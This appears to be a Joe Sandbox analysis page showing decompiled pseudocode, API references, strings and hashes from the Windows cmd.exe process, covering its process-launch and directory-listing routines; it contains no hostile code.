					 *0xdc3cf0 = GetLastError();
					E00DA5011(_t135);
					L21:
					return E00D97614(_t135, _t174, _t177);
				}
				 *((intOrPtr*)(_t178 - 0xb8)) = 1;
				_t74 = _t178 - 0xa0;
				__imp__UpdateProcThreadAttribute(_t74, 0, 0x60001, _t178 - 0xb8, 4, 0, 0);
				if(_t74 == 0) {
					 *0xdc3cf0 = GetLastError();
					E00DA5011(_t135);
					__imp__DeleteProcThreadAttributeList(_t178 - 0xa0);
					goto L36;
				} else {
					memset(_t178 - 0x118, 0, 0x48);
					 *((intOrPtr*)(_t178 - 0xd4)) = _t178 - 0xa0;
					 *(_t178 - 0x118) = 0x48;
					 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)(_t178 + 0x14));
					 *((intOrPtr*)(_t178 - 0x108)) = 0;
					 *((intOrPtr*)(_t178 - 0x104)) = 1;
					_t84 = 0x64;
					 *((intOrPtr*)(_t178 - 0x100)) = _t84;
					 *((intOrPtr*)(_t178 - 0xfc)) = _t84;
					 *((intOrPtr*)(_t178 - 0xec)) = 0;
					 *(_t178 - 0xe8) = 1;
					memset(_t178 - 0x68, 0, 0x44);
					 *(_t178 - 0x68) = 0x44;
					GetStartupInfoW(_t178 - 0x68);
					 *((intOrPtr*)(_t178 - 0x110)) =  *((intOrPtr*)(_t178 - 0x60));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					if(E00D93320(L"COPYCMD") == 0) {
					}
					_t90 = E00D8DF40(0xd824ac);
					 *((intOrPtr*)(_t178 - 0xb0)) = _t90;
					if(_t90 == 0) {
						L35:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0xdad0b4);
						L00D982BB();
						L36:
						goto L21;
					}
					if( *0xdc3ccc == 0) {
						__eflags =  *0xdc8058;
						if( *0xdc8058 != 0) {
							goto L6;
						}
						__eflags =  *0xdc3cc4;
						if( *0xdc3cc4 == 0) {
							L8:
							E00D94C00();
							_t94 =  *0xdc3cc4;
							if(_t94 != 0) {
								_t147 = _t94[0x18];
								__eflags = _t147;
								if(_t147 == 0) {
									goto L9;
								}
								_t129 =  *0xdc3cb8;
								__eflags = _t129;
								if(_t129 == 0) {
									_t129 = 0xdc3ab0;
								}
								_t98 = CreateProcessAsUserW(_t147, _t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t129, _t178 - 0x118, _t178 - 0xcc);
								L11:
								_t174 = _t98;
								if(_t174 == 0) {
									_t99 = GetLastError();
									 *(_t178 - 0xac) = _t99;
									 *0xdc3cf0 = _t99;
								} else {
									 *(_t178 - 0xa4) =  *(_t178 - 0xcc);
									CloseHandle( *(_t178 - 0xc8));
								}
								_t150 = L"COPYCMD";
								E00D93A50(L"COPYCMD",  *((intOrPtr*)(_t178 - 0xb0)));
								if(_t174 == 0) {
									__eflags =  *0xdc3cc9;
									if( *0xdc3cc9 == 0) {
										L48:
										__eflags =  *0xdc3cf0 - 0x2e4;
										if( *0xdc3cf0 != 0x2e4) {
											L54:
											__eflags = _t174;
											if(_t174 != 0) {
												goto L14;
											}
											_t177 = E00D900B0(0xffce);
											__eflags = _t177;
											if(_t177 != 0) {
												E00D91040(_t177, 0x7fe7, _t135);
												E00DA5011(_t177);
												E00D90040(_t177);
											}
											goto L35;
										}
										L49:
										_t122 = E00D97797(_t150);
										__eflags = _t122;
										if(_t122 == 0) {
											_t174 = _t177;
										} else {
											_t163 =  *0xdc3cb8;
											__eflags = _t163;
											if(_t163 == 0) {
												_t163 = 0xdc3ab0;
											}
											_t174 =  *0xdcc01c(_t177, _t135,  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0xbc)) + 0x3c)), _t163,  *(_t178 - 0xe8) & 0x0000ffff, _t178 - 0xa4, 0xdc3cf0);
										}
										goto L54;
									}
									__eflags =  *0xdc3cf0 - 0xc1;
									if( *0xdc3cf0 == 0xc1) {
										goto L49;
									}
									goto L48;
								} else {
									L14:
									_t101 =  *(_t178 - 0xa4);
									_t174 = _t101 & 1;
									_t167 = 2;
									_t154 = _t101 & _t167;
									if(_t101 == 0) {
										L62:
										_t135 = 4;
										L16:
										 *(_t178 - 0xac) = _t177;
										 *0xdb3838 = 1;
										if(_t135 != 0) {
											L26:
											__eflags = _t135 - 4;
											if(_t135 == 4) {
												_t104 =  *(_t178 - 0xa4);
												__eflags = _t104;
												if(_t104 != 0) {
													CloseHandle(_t104);
													 *(_t178 - 0xa4) = _t177;
												}
											} else {
												__eflags = _t135 - _t167;
												if(_t135 == _t167) {
													 *0xdad54c =  *(_t178 - 0xa4);
												}
											}
											L20:
											 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
											E00D93A30();
											goto L21;
										}
										_t109 = E00D94C3E();
										 *0xdbb8b0 = _t109;
										 *(_t178 - 0xa4) = _t177;
										_t177 = _t109;
										 *(_t178 - 0xac) = _t177;
										E00D9274C(_t178 - 0x4c, 0x14, L"%08X", _t177);
										E00D93A50(L"=ExitCode", _t178 - 0x4c);
										if(_t177 >= 0x20) {
											__eflags = _t177 - 0x7e;
											if(_t177 > 0x7e) {
												goto L18;
											}
											E00D9274C(_t178 - 0x80, 0xc, L"%01C", _t177);
											_t169 = _t178 - 0x80;
											L19:
											E00D93A50(L"=ExitCodeAscii", _t169);
											if(_t174 != 0) {
												E00DA579A(L"=ExitCodeAscii", __eflags);
											}
											goto L20;
										}
										L18:
										_t169 = 0xd824f0;
										goto L19;
									}
									_t135 =  *(_t178 - 0xa8);
									if( *0xdc3ccc == 0) {
										__eflags =  *0xdc3cc4;
										if( *0xdc3cc4 != 0) {
											goto L16;
										}
										__eflags =  *0xdc3cc9;
										if( *0xdc3cc9 == 0) {
											goto L16;
										} else {
											__eflags =  *0xdc8058;
											if( *0xdc8058 != 0) {
												goto L16;
											}
											__eflags = _t135;
											if(_t135 != 0) {
												goto L16;
											}
											__eflags = _t154;
											if(_t154 != 0) {
												goto L62;
											}
											_t117 = E00DA52E3(_t101, _t167);
											_t167 = 2;
											__eflags = _t167 - _t117;
											if(_t167 != _t117) {
												goto L16;
											}
											goto L62;
										}
										goto L26;
									}
									goto L16;
								}
							}
							L9:
							_t95 =  *0xdc3cb8;
							if(_t95 == 0) {
								_t95 = 0xdc3ab0;
							}
							_t98 = CreateProcessW(_t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t95, _t178 - 0x118, _t178 - 0xcc);
							goto L11;
						}
					}
					L6:
					_t165 = 0x5c;
					_t92 = E00D92349(_t135, _t165);
					if(_t92 != 0 && lstrcmpW(_t92, L"\\XCOPY.EXE") == 0) {
						E00DA4478();
					}
					goto L8;
				}
			}

0x00d93758
0x00d9375d
0x00d93763
0x00d93769
0x00d9376c
0x00d9376f
0x00d93771
0x00d93777
0x00d9377d
0x00d93783
0x00d93799
0x00d937a0
0x00d937a8
0x00d9ddec
0x00d9ddf3
0x00d939e2
0x00d939e7
0x00d939e7
0x00d937b1
0x00d937c8
0x00d937cf
0x00d937d7
0x00d9de08
0x00d9de0f
0x00d9de1b
0x00000000
0x00d937dd
0x00d937e7
0x00d937f5
0x00d937fb
0x00d93808
0x00d9380e
0x00d93817
0x00d9381f
0x00d93820
0x00d93826
0x00d9382c
0x00d93832
0x00d93840
0x00d93848
0x00d93853
0x00d9385c
0x00d93862
0x00d93871
0x00d93873
0x00d9387a
0x00d9387f
0x00d93887
0x00d9de3e
0x00d9de3e
0x00d9de43
0x00d9de44
0x00d9de49
0x00d9de51
0x00000000
0x00d9de53
0x00d93894
0x00d9de59
0x00d9de60
0x00000000
0x00000000
0x00d9de66
0x00d9de6d
0x00d938bc
0x00d938bc
0x00d938c1
0x00d938c8
0x00d939ea
0x00d939ed
0x00d939ef
0x00000000
0x00000000
0x00d9de82
0x00d9de87
0x00d9de89
0x00d9de8b
0x00d9de8b
0x00d9deae
0x00d938fe
0x00d938fe
0x00d93902
0x00d9dec3
0x00d9dec9
0x00d9decf
0x00d93908
0x00d9390e
0x00d9391a
0x00d9391a
0x00d93926
0x00d9392b
0x00d93932
0x00d9ded9
0x00d9dee0
0x00d9deee
0x00d9deee
0x00d9def8
0x00d9df3e
0x00d9df3e
0x00d9df40
0x00000000
0x00000000
0x00d9df50
0x00d9df52
0x00d9df54
0x00d9de2b
0x00d9de32
0x00d9de39
0x00d9de39
0x00000000
0x00d9df54
0x00d9defa
0x00d9defa
0x00d9deff
0x00d9df01
0x00d9df3c
0x00d9df03
0x00d9df03
0x00d9df09
0x00d9df0b
0x00d9df0d
0x00d9df0d
0x00d9df38
0x00d9df38
0x00000000
0x00d9df01
0x00d9dee2
0x00d9deec
0x00000000
0x00000000
0x00000000
0x00d93938
0x00d93938
0x00d93938
0x00d93943
0x00d93949
0x00d9394a
0x00d9394e
0x00d9df98
0x00d9df9a
0x00d93967
0x00d93967
0x00d93970
0x00d93977
0x00d93a0c
0x00d93a0c
0x00d93a0f
0x00d9dfbc
0x00d9dfc2
0x00d9dfc4
0x00d9dfcb
0x00d9dfd1
0x00d9dfd1
0x00d93a15
0x00d93a15
0x00d93a17
0x00d93a1f
0x00d93a1f
0x00d93a17
0x00d939d4
0x00d939d4
0x00d939db
0x00000000
0x00d939e0
0x00d93983
0x00d93988
0x00d9398d
0x00d93993
0x00d93995
0x00d939a7
0x00d939b7
0x00d939bf
0x00d93a26
0x00d93a29
0x00000000
0x00000000
0x00d9dfac
0x00d9dfb4
0x00d939c6
0x00d939cb
0x00d939d2
0x00d93a49
0x00d93a49
0x00000000
0x00d939d2
0x00d939c1
0x00d939c1
0x00000000
0x00d939c1
0x00d93954
0x00d93961
0x00d939fa
0x00d93a01
0x00000000
0x00000000
0x00d9df5f
0x00d9df66
0x00000000
0x00d9df6c
0x00d9df6c
0x00d9df73
0x00000000
0x00000000
0x00d9df79
0x00d9df7b
0x00000000
0x00000000
0x00d9df81
0x00d9df83
0x00000000
0x00000000
0x00d9df87
0x00d9df8e
0x00d9df8f
0x00d9df92
0x00000000
0x00000000
0x00000000
0x00d9df92
0x00000000
0x00d9df66
0x00000000
0x00d93961
0x00d93932
0x00d938ce
0x00d938ce
0x00d938d5
0x00d9deb9
0x00d9deb9
0x00d938f8
0x00000000
0x00d938f8
0x00d9de73
0x00d9389a
0x00d9389c
0x00d9389f
0x00d938a6
0x00d9de78
0x00d9de78
0x00000000
0x00d938a6

APIs

InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,00DABDF8,00000108,00D8C897,?,00000000,00000000,00000000), ref: 00D937A0
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 00D937CF
memset.MSVCRT ref: 00D937E7
memset.MSVCRT ref: 00D93840
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00D93853

Part of subcall function 00D93320: _wcsnicmp.MSVCRT ref: 00D933A4

lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00D938AE
CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00D938F8
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00D9391A
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00D9DDE6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00D9DE02
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 00D9DE1B
CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00D9DEAE
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00D9DFCB

Strings

%08X, xrefs: 00D9399C
D, xrefs: 00D93848
\XCOPY.EXE, xrefs: 00D938A8
COPYCMD, xrefs: 00D93865, 00D93926
, xrefs: 00D93783
=ExitCode, xrefs: 00D939B2
%01C, xrefs: 00D9DFA1
=ExitCodeAscii, xrefs: 00D939C6
H, xrefs: 00D937FB

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
API String ID: 1603632292-3461277227
Opcode ID: 8fae309519ad9b7daf97067fceaa21a2022fe94eb2b8feced6c19f365ac79780
Instruction ID: ca7d0a520238cbbc0121234c993248d26b829bbb39123e809336bcf06dc3ef86
Opcode Fuzzy Hash: 8fae309519ad9b7daf97067fceaa21a2022fe94eb2b8feced6c19f365ac79780
Instruction Fuzzy Hash: BFC16F71A00316AEDF249F64DC49FAAB7B9EB45704F0441A9F58AE7290DB708E84CF71

Uniqueness

Uniqueness Score: -1.00%

Function 00D96550, Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 535
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00D96550(void* _a4, signed int _a8, void* _a12, signed int* _a16, void* _a20, signed int* _a24, char _a28, long _a32, char _a36, long _a40, short _a42, int _a44, void _a48, int _a564, int _a568, signed int _a572, int _a576, char _a612, void _a648, intOrPtr _a1152, char _a1156, int _a1168, signed int _a1172, char* _a1176, char _a1184, intOrPtr _a1208, void _a1212, signed int _a1220, signed short _a1222, signed int _a1224, signed int _a1226, signed int _a17612) {
				struct _SECURITY_DESCRIPTOR* _v0;
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t190;
				signed int _t191;
				void* _t192;
				signed int _t195;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr _t217;
				signed int _t219;
				signed int _t221;
				signed int _t223;
				signed int* _t228;
				signed int _t237;
				signed int _t240;
				WCHAR* _t241;
				void* _t242;
				signed int _t243;
				void* _t245;
				signed int _t256;
				void* _t257;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				WCHAR* _t281;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				signed int _t306;
				struct _SECURITY_DESCRIPTOR* _t310;
				signed int _t311;
				void* _t312;
				signed int _t313;
				char* _t314;
				struct _SECURITY_DESCRIPTOR* _t315;
				void* _t316;
				intOrPtr _t317;
				intOrPtr* _t331;
				void* _t337;
				void* _t345;
				void* _t364;
				void* _t371;
				void* _t373;
				intOrPtr _t374;
				intOrPtr _t381;
				char* _t383;
				intOrPtr _t388;
				intOrPtr _t389;
				signed int* _t394;
				void* _t395;
				int _t396;
				void* _t399;
				void* _t400;
				signed int _t401;
				signed int _t402;

				_t402 = _t401 & 0xfffffff8;
				E00D98290(0x44d4);
				_t187 =  *0xdad0b4; // 0x35c4fbb8
				_a17612 = _t187 ^ _t402;
				_t371 = _a4;
				_t310 = _a8;
				_t399 = _a12;
				_t394 = _a16;
				_t316 =  &(_t310->Owner);
				_a4 = _t316;
				_t317 =  *((intOrPtr*)(_t316 + 0x1c));
				 *((intOrPtr*)(_t371 + 0x28)) =  *((intOrPtr*)(_t371 + 0x28)) +  *((intOrPtr*)(_t316 + 0x20));
				_a12 = _t371;
				asm("adc [edx+0x2c], ecx");
				_t190 =  *_t394;
				_t372 = _t190;
				_v0 = _t310;
				_a24 = _t394;
				if((_t190 & 0x00000010) != 0) {
					__eflags = _t190;
					if(_t190 < 0) {
						goto L1;
					}
					 *_t394 = _t190 & 0xffffffef;
					_t195 = E00D965F0(_t394, _a12, _t399, _t394);
					_t372 =  *_t394 | 0x00000010;
					 *_t394 = _t372;
					__eflags = _t195;
					if(_t195 != 0) {
						L5:
						_pop(_t395);
						_pop(_t400);
						_pop(_t312);
						return E00D96FD0(_t195, _t312, _a17612 ^ _t402, _t372, _t395, _t400);
					}
					_t372 = _t372 | 0x80000000;
					 *_t394 = _t372;
				}
				L1:
				if((_t372 & 0x00000040) == 0) {
					__eflags = _t372 & 0x00000004;
					if((_t372 & 0x00000004) == 0) {
						__eflags = _t372 & 0x00000402;
						if(__eflags == 0) {
							_t191 =  *(_t310 + 2) & 0x0000ffff;
							__eflags = _t191;
							if(_t191 == 0) {
								_t192 = 0x2c;
							} else {
								_t192 = 0x2c + _t191 * 2;
							}
							_t311 = E00DAA49A(_t399, _t372, _t192 +  &(_t310->Owner), _t317);
							__eflags = _t311;
							if(_t311 == 0) {
								_t373 = 0xe;
								E00DA7A11(_t399, _t373);
								_t372 = _t394[0x17];
								_t311 = E00DAA3E9(_t399, _t394[0x17],  *_t394, _a4);
							}
							__eflags =  *(_t399 + 8);
							if( *(_t399 + 8) == 0) {
								L4:
								_t195 = _t311;
								goto L5;
							}
							_t195 = E00D8B610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L4;
						}
						_t325 = _t399;
						_t372 = _t394[0x17];
						_t311 = E00DAA2C1(_t310, _t399, _t394[0x17], __eflags, _t394[0x17], _a4);
						_t200 = 0;
						_a24 = 0;
						__eflags = _t311;
						if(_t311 != 0) {
							L70:
							__eflags =  *(_t399 + 8) - _t200;
							if( *(_t399 + 8) == _t200) {
								L72:
								__eflags =  *_t394 & 0x00100000;
								if(( *_t394 & 0x00100000) == 0) {
									goto L4;
								}
								_t201 = E00D97797(_t325);
								__eflags = _t201;
								if(_t201 == 0) {
									goto L4;
								}
								_a1172 = 1;
								_a1176 = 0x104;
								_a1168 = 0;
								memset( &_a648, 0, 0x104);
								_t402 = _t402 + 0xc;
								__eflags = _a1172;
								_t210 = E00D90C70( &_a648, ((0 | _a1172 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
								__eflags = _t210;
								if(_t210 < 0) {
									L91:
									__imp__??_V@YAXPAX@Z(_a1168);
									goto L4;
								}
								_t329 = _a1168;
								__eflags = _a1168;
								if(_a1168 == 0) {
									_t329 =  &_a648;
								}
								_t372 = _a1176;
								_t214 = E00D951C9(_t329, _a1176,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
								__eflags = _t214;
								if(_t214 == 0) {
									_t215 = _a1168;
									__eflags = _t215;
									if(_t215 == 0) {
										_t215 =  &_a648;
									}
									_t372 = 0;
									_t216 =  *0xdcc00c(_t215, 0,  &_a48, 0);
									_v16 = _t216;
									__eflags = _t216 - 0xffffffff;
									if(_t216 != 0xffffffff) {
										do {
											_t331 =  &_a40;
											_t372 = _t331 + 2;
											do {
												_t217 =  *_t331;
												_t331 = _t331 + 2;
												__eflags = _t217 - _a16;
											} while (_t217 != _a16);
											__eflags = _t331 - _t372 >> 1 - 2;
											if(__eflags < 0) {
												L85:
												_t372 =  *_t394;
												_t219 = E00DA9FD6(_t399,  *_t394, __eflags, _v12,  &_a32);
												_t311 = _t219;
												__eflags = _t311;
												if(_t311 != 0) {
													goto L89;
												}
												__eflags =  *(_t399 + 8) - _t219;
												if( *(_t399 + 8) == _t219) {
													goto L89;
												}
												_t223 = E00D8B610(_t311, _t399, _t394);
												_a8 = _t223;
												__eflags = _t223;
												if(_t223 == 0) {
													goto L89;
												}
												__imp__??_V@YAXPAX@Z(_a1152);
												_t195 = _a8;
												goto L5;
											}
											__eflags = _a42 - 0x3a;
											if(__eflags == 0) {
												goto L89;
											}
											goto L85;
											L89:
											_t221 =  *0xdcc038(_v16,  &_a32);
											__eflags = _t221;
										} while (_t221 != 0);
										FindClose(_v24);
									}
								}
								goto L91;
							}
							_t325 = _t399;
							_t195 = E00D8B610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L72;
						}
						__eflags =  *_t394 & 0x00000400;
						if(( *_t394 & 0x00000400) == 0) {
							_t374 =  *0xdad190; // 0x13
							_t375 = _t374 + 0x13;
							__eflags = _t374 + 0x13;
						} else {
							_t315 = _v0;
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								_t389 =  *0xdad190; // 0x13
								_t364 = _t399;
								E00DA7A11(_t364, _t389 + 0x13);
								_push(_t364);
								E00D96740(_t399,  *_t394, _t315 + 0x30 + ( *(_t315 + 2) & 0x0000ffff) * 2);
							}
							_t388 =  *0xdad190; // 0x13
							_t375 = _t388 + 0x20;
						}
						_t337 = _t399;
						E00DA7A11(_t337, _t375);
						_t372 =  *_t394;
						_t313 = L"...";
						_a8 = _t313;
						__eflags = _t372 & 0x00040000;
						if((_t372 & 0x00040000) == 0) {
							L42:
							_push(_t337);
							_t325 = _t399;
							_a16 = _a4 + 0x2c;
							_t311 = E00D96740(_t399, _t372, _a4 + 0x2c);
							_t228 = _v4;
							__eflags =  *_t228 & 0x00000400;
							if(( *_t228 & 0x00000400) == 0) {
								L69:
								_t200 = 0;
								__eflags = 0;
								goto L70;
							}
							__eflags = _t228[9] & 0x20000000;
							if((_t228[9] & 0x20000000) == 0) {
								goto L69;
							}
							_a568 = 1;
							_a572 = 0x104;
							_a564 = 0;
							memset( &_a44, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a568;
							_t237 = E00D90C70( &_a44, ((0 | _a568 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t237;
							if(_t237 < 0) {
								L67:
								_t372 = L"%s";
								E00D96B76(_t399, L"%s", L" [.]");
								L68:
								__imp__??_V@YAXPAX@Z(_a564);
								_pop(_t325);
								goto L69;
							}
							_t341 = _a564;
							__eflags = _a564;
							if(_a564 == 0) {
								_t341 =  &_a44;
							}
							_t240 = E00D951C9(_t341, _a572,  *((intOrPtr*)(_a8 + 4)), _a12);
							__eflags = _t240;
							if(_t240 != 0) {
								goto L67;
							} else {
								_t241 = _a564;
								__eflags = _t241;
								if(_t241 == 0) {
									_t241 =  &_a44;
								}
								_t242 = CreateFileW(_t241, 8, 7, 0, 3, 0x2200000, 0);
								_a12 = _t242;
								__eflags = _t242 - 0xffffffff;
								if(_t242 != 0xffffffff) {
									_t243 = DeviceIoControl(_t242, 0x900a8, 0, 0,  &_a1212, 0x4002,  &_a32, 0);
									_t372 = L"%s";
									_t345 = _t399;
									__eflags = _t243;
									if(_t243 != 0) {
										E00D96B76(_t345, L"%s", L" [");
										__eflags = _a1208 - 0xa0000003;
										if(_a1208 != 0xa0000003) {
											__eflags = _a1212 - 0xa000000c;
											if(_a1212 != 0xa000000c) {
												_t396 = 6;
												L63:
												_t133 = _t396 + 2; // 0x8
												_t245 = E00D900B0(_t133);
												_v4 = _t245;
												__eflags = _t245;
												if(_t245 != 0) {
													memcpy(_t245, _a4, _t396);
													_t402 = _t402 + 0xc;
													__eflags = 0;
													 *((short*)(_v4 + (_t396 >> 1) * 2)) = 0;
													E00D96B76(_t399, L"%s", _v4);
													E00D90040(_v8);
												}
												_t372 = L"%s";
												E00D96B76(_t399, L"%s", "]");
												_t394 = _a16;
												goto L66;
											}
											_t396 = _a1226 & 0x0000ffff;
											_a4 = _t402 + 0x4e4 + ((_a1224 & 0x0000ffff) >> 1) * 2;
											__eflags = _t396;
											if(_t396 != 0) {
												goto L63;
											}
											_t256 = (_a1220 & 0x0000ffff) >> 1;
											__eflags = _t256;
											_t257 = _t402 + 0x4e4 + _t256 * 2;
											L61:
											_t396 = _a1222 & 0x0000ffff;
											_a4 = _t257;
											goto L63;
										}
										_t396 = _a1226 & 0x0000ffff;
										_a4 = _t402 + 0x4e0 + ((_a1224 & 0x0000ffff) >> 1) * 2;
										__eflags = _t396;
										if(_t396 != 0) {
											goto L63;
										}
										_t257 = _t402 + 0x4e0 + ((_a1220 & 0x0000ffff) >> 1) * 2;
										goto L61;
									}
									_push(L" [...]");
									goto L54;
								} else {
									_push(L" [..]");
									_t372 = L"%s";
									_t345 = _t399;
									L54:
									E00D96B76(_t345, _t372);
									L66:
									CloseHandle(_a12);
									goto L68;
								}
							}
						} else {
							_a16 = 0x101;
							_a20 = 0;
							_a568 = 0;
							_a28 = 0x10;
							_a572 = 1;
							_a576 = 0x104;
							memset( &_a48, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a572;
							_t272 = E00D90C70( &_a48, ((0 | _a572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t272;
							if(_t272 >= 0) {
								_t273 = E00D900B0(0x10000);
								_v0 = _t273;
								__eflags = _t273;
								if(_t273 != 0) {
									_t354 = _a568;
									__eflags = _a568;
									if(_a568 == 0) {
										_t354 =  &_a48;
									}
									_t277 = E00D951C9(_t354, _a576,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
									__eflags = _t277;
									if(_t277 != 0) {
										L33:
										E00D96B76(_t399, L"%s", _t313);
										goto L36;
									} else {
										_t281 = _a568;
										__eflags = _t281;
										if(_t281 == 0) {
											_t281 =  &_a48;
										}
										_t282 = GetFileSecurityW(_t281, 1, _v0, 0x10000,  &_a40);
										__eflags = _t282;
										if(_t282 == 0) {
											goto L33;
										} else {
											_t285 = GetSecurityDescriptorOwner(_v0,  &_a20,  &_a44);
											__eflags = _t285;
											if(_t285 == 0) {
												goto L33;
											}
											_t286 = E00D97797( &_a40);
											__eflags = _t286;
											if(_t286 == 0) {
												L34:
												_push(_t313);
												_t383 = L"%s";
												L35:
												E00D96B76(_t399, _t383);
												__eflags = 0;
												_a16 = 0;
												L36:
												E00D90040(_v0);
												L37:
												__eflags =  *_t394 & 0x00000400;
												_t381 =  *0xdad190; // 0x13
												if(( *_t394 & 0x00000400) == 0) {
													_t382 = _t381 + 0x2a;
													__eflags = _t381 + 0x2a;
												} else {
													_t382 = _t381 + 0x37;
												}
												E00DA7A11(_t399, _t382);
												L41:
												__imp__??_V@YAXPAX@Z(_a568);
												_t372 =  *_t394;
												_pop(_t337);
												goto L42;
											}
											 *0xdcc034(0, _a20,  &_a648,  &_a16,  &_a1184,  &_a28,  &_a36);
											__eflags = 0;
											if(0 == 0) {
												goto L34;
											}
											_t314 = L"%s";
											E00D96B76(_t399, _t314,  &_a1156);
											E00D96B76(_t399, _t314, "\\");
											_t383 = _t314;
											_push( &_a612);
											goto L35;
										}
									}
								}
								E00D96B76(_t399, L"%s", _t313);
								goto L37;
							}
							E00D96B76(_t399, L"%s", _t313);
							goto L41;
						}
					}
					_t306 = E00DAAB79(_t399, _t372, _a4);
					L3:
					_t311 = _t306;
					goto L4;
				}
				_t306 = E00D9660F(_t399, _t372,  *((intOrPtr*)(_a12 + 4)), _a4);
				goto L3;
			}

0x00d96555
0x00d9655d
0x00d96562
0x00d96569
0x00d96570
0x00d96574
0x00d96578
0x00d9657c
0x00d9657f
0x00d96585
0x00d96589
0x00d9658c
0x00d9658f
0x00d96593
0x00d96596
0x00d96598
0x00d9659a
0x00d9659e
0x00d965a4
0x00d9f9ae
0x00d9f9b0
0x00000000
0x00000000
0x00d9f9bf
0x00d9f9c1
0x00d9f9c8
0x00d9f9cb
0x00d9f9cd
0x00d9f9cf
0x00d965ca
0x00d965d1
0x00d965d2
0x00d965d3
0x00d965de
0x00d965de
0x00d9f9d5
0x00d9f9db
0x00d9f9db
0x00d965aa
0x00d965ad
0x00d9f9e2
0x00d9f9e5
0x00d9f9f8
0x00d9f9fe
0x00da0030
0x00da0034
0x00da0037
0x00da0044
0x00da0039
0x00da0039
0x00da0039
0x00da0053
0x00da0055
0x00da0057
0x00da005b
0x00da005e
0x00da0067
0x00da0073
0x00da0073
0x00da0075
0x00da0079
0x00d965c8
0x00d965c8
0x00000000
0x00d965c8
0x00da0081
0x00da0086
0x00da0088
0x00000000
0x00000000
0x00000000
0x00da008e
0x00d9fa08
0x00d9fa0b
0x00d9fa13
0x00d9fa15
0x00d9fa17
0x00d9fa1b
0x00d9fa1d
0x00d9feac
0x00d9feac
0x00d9feaf
0x00d9fec0
0x00d9fec0
0x00d9fec6
0x00000000
0x00000000
0x00d9fecc
0x00d9fed1
0x00d9fed3
0x00000000
0x00000000
0x00d9fede
0x00d9fee8
0x00d9fef1
0x00d9ff00
0x00d9ff0e
0x00d9ff11
0x00d9ff27
0x00d9ff2c
0x00d9ff2e
0x00da001d
0x00da0024
0x00000000
0x00da002a
0x00d9ff34
0x00d9ff3b
0x00d9ff3d
0x00d9ff3f
0x00d9ff3f
0x00d9ff4a
0x00d9ff5c
0x00d9ff61
0x00d9ff63
0x00d9ff69
0x00d9ff70
0x00d9ff72
0x00d9ff74
0x00d9ff74
0x00d9ff7b
0x00d9ff85
0x00d9ff8b
0x00d9ff8f
0x00d9ff92
0x00d9ff98
0x00d9ff98
0x00d9ff9c
0x00d9ff9f
0x00d9ff9f
0x00d9ffa2
0x00d9ffa5
0x00d9ffa5
0x00d9ffb0
0x00d9ffb3
0x00d9ffbd
0x00d9ffbd
0x00d9ffca
0x00d9ffcf
0x00d9ffd1
0x00d9ffd3
0x00000000
0x00000000
0x00d9ffd5
0x00d9ffd8
0x00000000
0x00000000
0x00d9ffdc
0x00d9ffe1
0x00d9ffe5
0x00d9ffe7
0x00000000
0x00000000
0x00d9fff0
0x00d9fff6
0x00000000
0x00d9fffa
0x00d9ffb5
0x00d9ffbb
0x00000000
0x00000000
0x00000000
0x00da0000
0x00da0009
